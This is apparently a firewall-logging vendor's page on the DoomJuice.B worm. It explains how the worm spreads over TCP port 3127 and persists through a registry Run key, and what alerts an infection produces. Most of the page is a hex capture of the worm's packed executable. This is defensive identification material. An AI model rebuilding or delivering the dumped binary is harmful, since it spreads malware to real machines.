Link Logger Home ZyXel Banner Binary Visions
Netgear
LinkSYS
Router

DoomJuice.B
Link Logger for Windows
Home Home Product Info Product Info Download Download/Purchase Support Support  
Link Logger for Windows

NewsLatest News

Screen ShotsScreenshots

Customer CommentsFeedback

Common ScansScans

Additional ResourcesResources

DoomJuice.B PortPeeker Capture

DoomJuice.B scans the internet on TCP port 3127 looking for myDoom infected systems as myDoom will execute a file send to TCP port 3127.  When DoomJuice.B is executed by myDoom it creates a file regedit.exe in the Windows System directory, C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).  Do not confuse this with regedit.exe in the windows directory which is the Windows Registry Edit program.  DoomJuice.B also creates a "NeroCheck" = "%System%\regedit.exe" entry in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 

If a system behind a firewall logged by Link Logger had an active DoomJuice.B infected system you would see a large volume of red alerts for outbound TCP port 3127 scans appear in Link Logger.

 

Port Peeker Capture of DoomJuice.B

TCP Connection Request
--- 12/02/2004 12:51:47.506

62.201.72.62 : 1492 TCP Connected ID = 5
--- 12/02/2004 12:51:47.567
Status Code: 0 OK

62.201.72.62 : 1492 TCP Data In Length 5125 bytes : MD5 = 3BB9041E19466420D1AF628371C1A7FC
--- 12/02/2004 12:51:47.647
0000 85 13 3C 9E A2 4D 5A 90 00 03 00 00 00 04 00 00 ..<..MZ.........
0010 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 .............@..
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 D0 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 .............!..
0050 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 L.!This program
0060 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E cannot be run in
0070 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 DOS mode....$..
0080 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 .....
0090 20 20 20 20 20 20 20 0A 20 20 20 20 20 20 20 20 .
00A0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00B0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
00C0 20 20 20 20 20 00 00 00 00 00 00 00 00 00 00 00 ...........
00D0 00 00 00 00 00 50 45 00 00 4C 01 03 00 BF 1F 1D .....PE..L......
00E0 40 00 00 00 00 00 00 00 00 E0 00 0F 01 0B 01 07 @...............
00F0 00 00 10 00 00 00 10 00 00 00 40 00 00 40 5B 00 ..........@..@[.
0100 00 00 50 00 00 00 60 00 00 00 00 40 00 00 10 00 ..P...`....@....
0110 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 ................
0120 00 00 00 00 00 00 70 00 00 00 10 00 00 00 00 00 ......p.........
0130 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 ................
0140 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 ................
0150 00 00 00 00 00 00 60 00 00 04 01 00 00 00 00 00 ......`.........
0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 .............UPX
01D0 30 00 00 00 00 00 40 00 00 00 10 00 00 00 00 00 0.....@.........
01E0 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01F0 00 80 00 00 E0 55 50 58 31 00 00 00 00 00 10 00 .....UPX1.......
0200 00 00 50 00 00 00 0E 00 00 00 04 00 00 00 00 00 ..P.............
0210 00 00 00 00 00 00 00 00 00 40 00 00 E0 55 50 58 .........@...UPX
0220 32 00 00 00 00 00 10 00 00 00 60 00 00 00 02 00 2.........`.....
0230 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0240 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 .@..............
0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
03E0 31 2E 32 34 00 55 50 58 21 0C 09 02 09 CB D6 4D 1.24.UPX!......M
03F0 DC C4 0F 57 45 61 33 00 00 3F 0B 00 00 00 1A 00 ...WEa3..?......
0400 00 26 04 00 94 FB 1F AA 90 00 49 6E 74 65 72 6E .&........Intern
0410 65 74 47 02 BB F6 6D 7B 43 6F 6E 08 63 0E 64 53 etG...m{Con.c.dS
0420 74 61 05 1B 77 69 B6 9F FB DD 6E 69 1A 2E 64 6C ta..wi....ni..dl
0430 6C 00 5C 0F 13 65 78 07 2E FF 6E 7B 6B 4E 35 6F l.\..ex...n{kN5o
0440 43 68 2E 6B 0B 53 6F 66 74 77 25 73 69 CB B6 ED Ch.k.Softw%si...
0450 B6 63 03 66 06 6E 64 04 73 02 72 56 9A FB ED F2 .c.f.nd.s.rV....
0460 65 25 73 6F 75 6E 23 61 72 65 5C 4D 2B 35 DE DE e%soun#are\M+5..
0470 FE D7 11 77 74 5C 57 00 6F 77 07 5C 43 75 13 65 ...wt\W.ow.\Cu.e
0480 6E 74 83 B5 7F 7B 72 3B 00 6E 5C 52 00 0D 0A 0B nt..{r;.n\R....
0490 8C 69 B2 BD FF 6F 06 3A 20 4B 65 65 70 2D 41 6C .i...o.: Keep-Al
04A0 69 76 65 19 43 48 B7 D7 6E DB 74 15 77 00 2E 6D ive.CH..n.t.w..m
04B0 73 50 7E 2E 63 5B FB CF DA 6F 6D 68 1E 00 3A 38 sP~.c[...omh..:8
04C0 30 00 55 73 A0 33 67 60 BF 7D 73 59 29 4D 6F 7A 0.Us.3g`.}sY)Moz
04D0 69 C2 61 2F 34 2E 30 21 DF BA 47 D8 00 1F 20 28 i.a/4.0!..G... (
04E0 48 70 FE 69 62 6C 65 CD 6D ED B7 3B 18 53 49 45 Hp.ible.m..;.SIE
04F0 20 36 15 09 57 D5 AE 1C 85 BD FF 73 20 4E 54 20 6..W......s NT
0500 35 2E 31 29 46 47 35 BE 3D C8 94 30 41 63 63 E0 5.1)FG5.=..0Acc.
0510 74 2D 45 6E F8 B7 6D DB 33 64 1F 67 48 67 47 70 t-En..m.3d.gHgGp
0520 2C 20 64 65 66 6C 6B B7 13 66 88 23 4C 61 1F 75 , deflk..f.#La.u
0530 61 6E 23 E1 01 F6 5A 71 18 17 2D 75 08 5A FB 6F an#...Zq..-u.Z.o
0540 07 47 45 65 2F 20 48 54 54 50 2F 31 B4 13 26 8C .GEe/ HTTP/1..&.
0550 BD CD 2B 22 2A 2F 2A 20 77 B4 83 E1 3D 1C AC A7 ..+"*/* w...=...
0560 63 33 53 A3 7B 57 30 34 07 53 E7 11 81 EC 90 01 c3S.{W04.S......
0570 05 FB B3 FD 7F 8D 44 24 00 50 6A 02 FF 15 B4 10 .....D$.Pj.....
0580 40 12 C4 C3 55 8B EC 1C 9B EF DF 70 14 02 FE 56 @...U......p...V
0590 57 6A 06 33 DB 43 53 20 98 8B F0 FF 66 BB FB 85 Wj.3.CS ....f...
05A0 F6 0F 84 E2 4D 83 FE FF 08 D9 8B 45 0C 83 65 F8 ....M......E..e.
05B0 00 89 F7 D9 FE FF 45 F4 8D 45 FC 50 68 7E 66 04 ......E..E.Ph~f.
05C0 80 56 89 5D FC 2F B8 3D A0 05 F6 DD 9B 6D EB 18 .V.]./.=.....m..
05D0 0D A4 3D 47 27 00 28 FC 75 1A 6A 32 11 FB DD FF ..=G'.(.u.j2....
05E0 CD 50 6A 10 FF 75 08 56 FF D7 83 F8 FF 17 74 D8 .Pj..u.V......t.
05F0 EB 6B 3D 33 23 66 B7 FD B6 75 7C 4B F4 50 8D 85 .k=3#f...u|K.P..
0600 F0 64 FF 06 EC FD 6E 6F F7 B7 6A AA 46 01 50 89 .d....no..j.F.P.
0610 B5 F0 0C 89 9D 12 0B F4 FE F7 6D B6 77 25 4E A8 ..........m.w%N.
0620 85 C0 45 3F 4D DD FE 60 05 0B 3D 56 E8 04 00 0E ..E?M..`..=V....
0630 22 18 75 29 CB 6E 27 9B 47 10 74 18 B6 FC 00 B3 ".u).n'.G.t.....
0640 FD 4D F7 60 B0 C6 EB 09 0A B0 33 C0 5F 5E 5B C9 .M.`......3._^[.
0650 C3 FE EF 76 B3 0C 54 A3 B0 30 04 C3 A1 05 69 C0 ...v..T..0....i.
0660 35 4E 5A 01 40 DC 37 BC C7 11 66 A1 B2 17 30 83 5NZ.@.7...f...0.
0670 EC 44 68 DC 28 8E 4D B6 DD 50 BC 50 32 60 09 14 .Dh.(.M..P.P2`..
0680 96 74 05 FD 9D 9C ED 93 75 13 12 5C 25 A6 20 68 .t......u..\%. h
0690 C0 FE BB 93 CE 0D 14 58 10 E6 4D FC 51 FF D0 F7 .......X..M.Q...
06A0 D8 1B C0 C2 DF 85 D6 03 7E 79 58 C9 5F B8 20 11 ........~yX._. .
06B0 17 C2 F6 17 BE BA 2C 93 8B F1 EB 0B 68 00 2F 00 ......,.....h./.
06C0 44 B9 F0 DD 6E 15 04 27 3B EC 33 FF 3B F7 94 18 D...n..';.3.;...
06D0 01 A6 FB 0F BF 46 04 53 68 37 0C 6D E8 66 C7 45 .....F.Sh7.m.f.E
06E0 E4 02 2A 8C FC 77 DF B6 66 0F E6 84 E4 6A 09 50 ..*..w..f....j.P
06F0 34 02 F6 8B D8 83 FB FF 59 59 66 DB 2C 2C AE F8 4.......YYf.,,..
0700 CB E0 3B DF 07 D8 66 7B 16 DC 68 04 43 40 E0 57 ..;...f{..h.C@.W
0710 39 6C C1 BA ED EE 57 68 80 18 6A 03 57 02 68 08 9l....Wh..j.W.h.
0720 80 1D 36 DE 22 1B 16 68 78 89 75 F4 19 94 96 ED ..6."..hx.u.....
0730 BF 43 8B 45 A2 9E 3C 13 C6 27 EE 85 4D B7 FB D9 .C.E..<..'..M...
0740 44 90 89 85 E1 0D 6A 05 3D EE 53 6D FF E1 EE 8B D.....j.=.Sm....
0750 1D 94 16 FF D3 57 87 89 7D FC BF 00 10 37 57 42 .....W..}....7WB
0760 E1 E3 83 1D 56 8B 35 64 3D 2A 13 3B 2E B4 2D D8 ....V.5d=*.;..-.
0770 FC 14 09 F8 2E BD 7E 28 F6 C9 BE 76 18 37 57 1A ......~(...v.7W.
0780 F4 FF D6 83 44 EE 86 F0 8D 3E CE 68 A0 1F 1D 30 ....D....>.h...0
0790 EB 01 53 E3 84 85 13 D2 5B D1 C9 AC 10 DA C4 38 ..S.....[......8
07A0 A1 63 6A 34 74 7C 70 8A FC D7 3E 2F 18 F0 6A 00 .cj4t|p...>/..j.
07B0 0E 6C 79 3A 83 C4 0C EB 07 8B 70 08 27 68 D6 64 .ly:......p.'h.d
07C0 F0 07 0F DD 8F FD 3F 0F 0F B7 C0 99 6A 64 59 F7 ......?.....jdY.
07D0 F9 0D 83 FA 55 7D 10 12 33 D6 F8 8E FF D2 83 C1 ....U}..3.......
07E0 3E F7 F1 8A 82 00 1B 3C 7F 74 CD 88 CC 20 42 69 >......<t... Bi
07F0 90 2D 07 F5 F6 54 E6 7B 57 F8 FB F0 88 5D F7 0F .-...T.{W....]..
0800 87 43 81 85 54 7E EC EB 99 0F E4 A4 A6 BB 05 D4 .C..T~..........
0810 6A BA 78 CC 88 01 6F B2 05 42 F2 86 B9 96 F8 1F j.x...o..B......
0820 DE 68 88 02 81 C2 B4 84 FA 01 7E 19 8D 72 FF 83 .h........~..r..
0830 E1 42 59 1F EC BB 75 16 7C C9 84 11 DA 4D 4C 4E .BY...u.|....MLN
0840 75 EA 49 DF EC C1 0E C2 64 E6 9C 0C 88 CE 74 2F u.I.....d.....t/
0850 D0 1E 84 11 10 57 0F 46 0C 8B 16 C7 16 98 E9 10 .....W.F........
0860 E7 BB B9 EB A5 B6 E1 66 FB 55 8D 6C 24 88 B4 A4 .......f.U.l$...
0870 80 65 D4 9F 74 50 03 DC D9 DC F6 D4 50 C7 07 7F .e..tP......P..
0880 26 6C 3C 10 9D BB 39 D9 70 D4 60 80 A5 E2 0C 30 &l<...9.p.`....0
0890 61 B9 6D 87 74 1B 54 C6 0A 2D 03 55 73 36 CB E5 a.m.t.T..-.Us6..
08A0 72 56 6E 57 63 58 5A 59 5A 6D E5 72 B9 5C 5B 74 rVnWcXZYZm.r.\[t
08B0 5C 78 5D 5F 5E 31 76 46 BA CB 5F 33 60 33 67 0E \x]_^1vF.._3`3g.
08C0 40 47 36 9B 79 78 6A 01 50 44 05 48 2D B7 C9 59 @G6.yxj.PD.H-..Y
08D0 FF E4 21 5F 40 83 C5 78 C9 ED 34 B3 61 3E 84 D5 ..!_@..x..4.a>..
08E0 6A 64 99 05 40 2E B7 5B FB FA 5A 7D 32 F3 5D E8 jd..@..[..Z}2.].
08F0 72 03 E9 65 EA 67 DB 2C B7 5F EB 65 88 4D EC 88 r..e.g.,._.e.M..
0900 ED 69 EE EF 2E 1A B2 2F CB 66 F0 F1 78 F2 5D F3 .i...../.f..x.].
0910 EB 5C 4A 6F 5C 68 67 06 3F 99 8B CA 17 03 3B CB .\Jo\hg.?.....;.
0920 F6 FF 3F D9 7E 1C 1A 1A 99 5B F7 FB 80 C2 61 88 ..?.~....[....a.
0930 54 3D E8 47 3B F9 7C E6 26 DD 68 1F E1 68 F4 20 T=.G;.|.&.h..h.
0940 E8 50 88 5C 13 66 68 F0 27 2D E9 82 0E 0A EC 9F .P.\.fh.'-......
0950 CC C5 3A 70 9A FD 53 69 73 06 0A 18 98 13 54 53 ..:p..Sis.....TS
0960 84 78 DD 2C B4 39 02 03 D0 75 0E 68 16 66 8B 7D .x.,.9...u.h.f.}
0970 6A 6E 1C 51 0C 50 0E 0D 20 6E 66 96 DE 38 9D 21 jn.Q.P.. nf..8.!
0980 B2 A5 2D 26 62 DB FF BE 24 4C 8D 0C 49 80 3C 08 ..-&b...$L..I.<.
0990 5C 74 3F E8 5E C9 4E F6 CE 1E D6 86 0C 6A 20 36 \t?.^.N......j 6
09A0 D9 C9 93 AE 28 29 53 02 53 40 1C 99 EC 01 33 68 ....()S.S@....3h
09B0 06 12 11 2C 67 5B D6 3D EB 2B 0B 30 5F 47 34 48 ...,g[.=.+.0_G4H
09C0 03 B3 60 0D D3 22 38 0C BC A9 F4 75 0F FF F3 E5 ..`.."8....u....
09D0 02 0F 8C 1D F7 88 C0 1B D6 CB 34 F3 B1 97 1B 9D ..........4.....
09E0 F9 82 8C 7C 56 FA 50 11 68 4C 3C CF F3 7C 04 44 ...|V.P.hL<..|.D
09F0 40 3C 38 30 3A 57 78 F8 28 11 58 D0 55 07 67 80 @<80:Wx.(.X.U.g.
0A00 C1 18 E1 91 FA 28 68 F8 6F 50 A3 54 E0 63 1B 0C .....(h.oP.T.c..
0A10 00 0F 70 50 BF 06 3A 0A 1D 85 B7 4D 6A 32 47 37 ..pP..:....Mj2G7
0A20 80 02 83 1C F6 9A 8A 16 1A 15 01 75 1C B8 13 B6 ...........u....
0A30 28 96 7C 4D 40 A1 D6 EF 6C 74 31 8D 0A 70 91 08 (.|M@...lt1..p..
0A40 08 1C 64 A3 99 04 B9 8C 74 10 08 A5 83 57 88 D2 ..d.....t....W..
0A50 89 C7 F7 5F 46 81 EF 68 9C 12 9B D7 AC A2 5B 99 ..._F..h......[.
0A60 8B DA 6D BD 8C CB A4 3C 7D AA 80 24 EB 17 BB F0 ..m....<}..$....
0A70 7A C9 13 1E 94 BC 68 12 48 9A 21 33 0C AF 1F 61 z.....h.H.!3...a
0A80 44 ED 4F C7 4A B9 08 85 D2 7C 18 24 BB 7F CB ED D.O.J....|.$...
0A90 04 7E 0C 29 06 7F 00 62 0C 68 B8 11 06 05 68 F0 .~.)..b.h....h.
0AA0 DF 47 D8 98 11 57 B8 94 11 95 50 7C 05 B8 90 EC .G...W....P|....
0AB0 19 01 FB 56 68 74 2A 5E 84 05 0D 5B 29 99 EB D7 ...Vht*^...[)...
0AC0 56 3B 0F 91 62 0C EC 81 35 58 59 68 54 0D B7 28 V;..b...5XYhT..(
0AD0 0C 09 B8 8B F8 94 75 07 FD 6D 30 81 56 33 51 B0 ......u..m0.V3Q.
0AE0 5B 7D F0 A5 D0 D1 4E C0 00 C6 BF 5A 8F 06 F3 17 [}....N....Z....
0AF0 C1 C2 78 C5 26 08 74 1B A4 89 2D D7 16 E5 CC 51 ..x.&.t...-....Q
0B00 80 A0 EC AD C1 E3 0A 47 8F 65 EB CD 6A AF 1E 74 .......G.e..j..t
0B10 C3 2E 50 0D 20 15 B6 1D 0B 94 CB EF CF 76 00 0A ..P. ........v..
0B20 52 E4 08 1D 2B 3F EB 90 43 A4 00 8B C0 6F E0 10 R...+?..C....o..
0B30 32 45 E0 53 50 33 F6 4D EF 5C 9E E8 9C 0E 56 18 2E.SP3.M.\....V.
0B40 92 8B 66 3D DC 2E B4 4B AA 77 06 05 F7 73 03 23 ..f=...K.w...s.#
0B50 46 66 95 4B B7 6F DE E2 01 75 02 09 3B F3 96 24 Ff.K.o...u..;..$
0B60 01 2F 81 65 FB 19 76 30 1F 0F 2A F1 35 05 2C FD ./.e..v0..*.5.,.
0B70 E6 2B 78 79 3B D3 7E 10 8B F2 A4 03 C8 E0 81 19 .+xy;.~.........
0B80 21 E5 F2 E0 E7 DB D0 E2 6D A0 BC 68 D8 04 D4 23 !.......m..h...#
0B90 2F 71 84 D0 F5 5C FF 08 68 BC 12 80 49 87 C4 21 /q...\..h...I..!
0BA0 53 07 8C 0C E8 A2 E9 E2 6A 50 46 F0 D6 42 F2 06 S.......jPF..B..
0BB0 2F 25 3B 8B 9D 47 4A 43 0D 03 0B 5F F8 3B FB 94 /%;..GJC..._.;..
0BC0 68 D5 27 30 78 36 B0 D7 52 47 8B 47 50 0C 66 0E h.'0x6..RG.GP.f.
0BD0 DA 59 52 56 CC 91 0F 1E B9 96 83 C2 20 C7 1C 2E .YRV........ ...
0BE0 1B 74 AD DC E9 44 50 CA 1A 53 53 48 DC BD 43 E7 .t...DP..SSH..C.
0BF0 13 37 0A 71 53 33 36 1F 32 1C 04 12 E8 07 32 08 .7.qS36.2.....2.
0C00 6A 9C EB 3D E9 A9 10 02 DC 64 98 20 6C D6 6C 15 j..=.....d. l.l.
0C10 5F 5A FC 56 98 0C C5 F6 92 DF 0B 07 E4 09 B5 A3 _Z.V............
0C20 14 C9 4D 6E FF 65 56 56 68 3E 1C 7A 56 56 1A 0E ..Mn.eVVh>.zVV..
0C30 FC A2 7B 7F EB F9 CC FF 25 AC 75 00 3D BB 73 0E ..{....%.u.=.s.
0C40 FB DF FE 1B 58 03 C4 83 C0 04 85 00 94 DE 50 C3 ....X.........P.
0C50 51 8D 4C 24 08 81 E9 1A BF FD D9 EF 2D 04 85 01 Q.L$........-...
0C60 26 EC 2B C8 8B C4 0C 8B E1 8B 08 8B AD 15 EE DA &.+.............
0C70 40 04 27 3F 8B 54 24 13 2D 39 53 AB DD E8 D2 74 @.'?.T$.-9S....t
0C80 4F 7B 8A 44 37 01 9E A8 F1 FF 7F 04 72 31 F7 D9 O{.D7......r1..
0C90 83 E1 03 74 0C 2B D1 88 07 83 C7 01 83 E9 1B 36 ...t.+.........6
0CA0 30 DF 5F B9 C8 C1 E0 08 03 C1 06 10 59 E2 3B 67 0._.........Y.;g
0CB0 DD DF 05 E9 02 74 06 F3 AB 3E 0A 27 EA 46 04 01 .....t...>.'.F..
0CC0 76 B7 5F C3 05 04 C3 00 00 FF FF FF 50 03 04 06 v._.........P...
0CD0 08 09 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 18 19 ................
0CE0 1A 1C 1D 1E FF FF FF FF 20 21 22 23 26 28 2B 2C ........ !"#&(+,
0CF0 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3D 3E 3F -./0123456789=>?
0D00 40 41 42 43 44 50 51 80 FF FF FF FF 81 82 83 84 @ABCDPQ.........
0D10 85 86 87 88 89 8A 8B 8C 8D 8E 8F 90 91 92 93 94 ................
0D20 95 96 97 98 99 9A 9B 9C 9D 9E 9F A0 FF FF FF FF ................
0D30 A1 A2 A3 A4 A5 A6 A7 A8 A9 AA AB AC AD AE AF B0 ................
0D40 B1 B2 B3 B4 B5 B6 B7 B8 B9 BA BB BC BD BE BF C0 ................
0D50 FF FF FF FF C1 C2 C3 C4 C6 C7 C8 C9 CA CB CC CD ................
0D60 CE CF D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC E0 ................
0D70 E1 E2 E3 E4 0A 12 E2 FF E5 E6 E7 E8 E9 EA EB EC ................
0D80 ED EE EF D0 45 05 58 22 0C F9 7F D3 1C 8C 10 01 ....E.X".......
0D90 45 78 69 74 50 72 6F 63 65 73 73 B6 FF 4B 50 4D ExitProcess..KPM
0DA0 4D 6F 64 75 6C 65 48 61 6E 64 05 41 3D 60 FF C7 ModuleHand.A=`..
0DB0 11 53 79 73 74 65 6D 54 69 6D 65 0E 44 69 72 BF .SystemTime.Dir.
0DC0 9D BD 01 E6 6F 72 79 23 54 11 70 50 61 74 68 2E ....ory#T.pPath.
0DD0 DD B6 75 0D 6C 1E 72 3A 6E 17 53 46 69 B2 B3 7D ..u.l.r:n.SFi..}
0DE0 EB 45 74 10 69 62 75 74 61 41 13 AD ED 66 BF 43 .Et.ibutaA...f.C
0DF0 6C 6F 73 71 61 44 65 05 16 04 05 FB 7B 23 19 6F losqaDe.....{#.o
0E00 70 79 0A 06 6B 77 ED E8 64 32 72 4E 61 8A 68 63 py..kw..d2rNa.hc
0E10 B7 01 B5 D7 73 26 8B 70 4D 1B 0F F9 ED 59 78 29 ....s&.pM....Yx)
0E20 4C 61 1B 45 72 72 6F 72 54 68 B3 12 D4 75 06 64 La.ErrorTh...u.d
0E30 92 6C 93 B1 F8 43 EC ED 69 63 6B 50 75 6E 74 0D .l...C..ickPunt.
0E40 01 41 64 64 72 D9 BB 6D 47 05 4C 6F 2A 4C 9D 72 .Addr..mG.Lo*L.r
0E50 61 DD 66 6C D8 73 DF 70 09 52 42 8D 54 99 BD D9 a.fl.s.p.RB.T...
0E60 9B B0 34 0F 9B FA 67 0B 6D 9B 72 58 69 85 61 79 ..4...g.m.rXi.ay
0E70 C0 75 4D 08 56 68 93 19 19 7A FD 4D 36 9A 0B 80 .uM.Vh...z.M6...
0E80 99 64 67 4F 70 5C 04 F7 BE 24 4B 65 79 45 CC 0E .dgOp\...$KeyE..
0E90 1E 0F 66 73 DF C5 0C 58 56 61 6C 75 65 1C 34 A6 ..fs...XValue.4.
0EA0 4D B7 B5 9F 80 77 73 70 64 58 66 13 B1 88 CB B2 M....wspdXf.....
0EB0 75 14 24 34 02 09 08 13 2C CB B2 2C 17 39 04 6F u.$4....,..,.9.o
0EC0 12 67 2C CB B2 97 03 73 0A 35 50 FC 87 FC 97 45 .g,....s.5P....E
0ED0 4C 01 02 00 BF 1F 1D 40 E0 00 0F 01 0B 01 07 1B L......@........
0EE0 E4 49 B3 14 02 B7 1D 30 0D B3 60 67 DD 2A 10 1B .I.....0..`g.*..
0EF0 04 33 07 AC 9B 2D 7B 1A 0C 3A 28 10 07 CB 4B EA .3...-{..:(...K.
0F00 0D 06 81 D0 1E 64 C8 BA 01 21 64 C0 1E 6C 43 E4 .....d...!d..lC.
0F10 18 2E 30 C1 18 12 90 BF 5D D8 17 EB 04 23 20 10 ..0.....]....# .
0F20 E0 2E 64 61 74 C2 BE 77 9A 61 B4 FB D4 18 6A 00 ..dat..w.a....j.
0F30 5F 76 E7 40 1B F4 1F 0D 32 00 00 00 00 00 00 00 _v.@....2.......
0F40 00 80 04 FF 00 60 BE 00 50 40 00 8D BE 00 C0 FF .....`..P@......
0F50 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 .W.............F
0F60 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED ..G..u........r.
0F70 B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB .......u........
0F80 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 ....s.u........s
0F90 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 .1....r......F..
0FA0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB .tt....u........
0FB0 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 ....u..........u
0FC0 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 A..u...........
0FD0 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 .s.u........s...
0FE0 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC ............/...
0FF0 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF v...B..GIu..c...
1000 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 ..............w.
1010 01 CF E9 4C FF FF FF 5E 89 F7 B9 2A 00 00 00 8A ...L...^...*....
1020 07 47 2C E8 3C 01 77 F7 80 3F 04 75 F2 8B 07 8A .G,.<.w..?.u....
1030 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 _.f........)....
1040 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE 00 30 00 ..............0.
1050 00 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 00 50 00 .....tE._...0.P.
1060 00 01 F3 50 83 C7 08 FF 96 64 50 00 00 95 8A 07 ...P.....dP.....
1070 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 G..t...y....GPG.
1080 57 48 F2 AE 55 FF 96 68 50 00 00 09 C0 74 07 89 WH..U..hP....t..
1090 03 83 C3 04 EB D8 FF 96 6C 50 00 00 61 E9 1A C1 ........lP..a...
10A0 FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
10B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
10C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
10D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
10E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
10F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
11A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
11B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
11C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
11D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
11E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
11F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
1200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
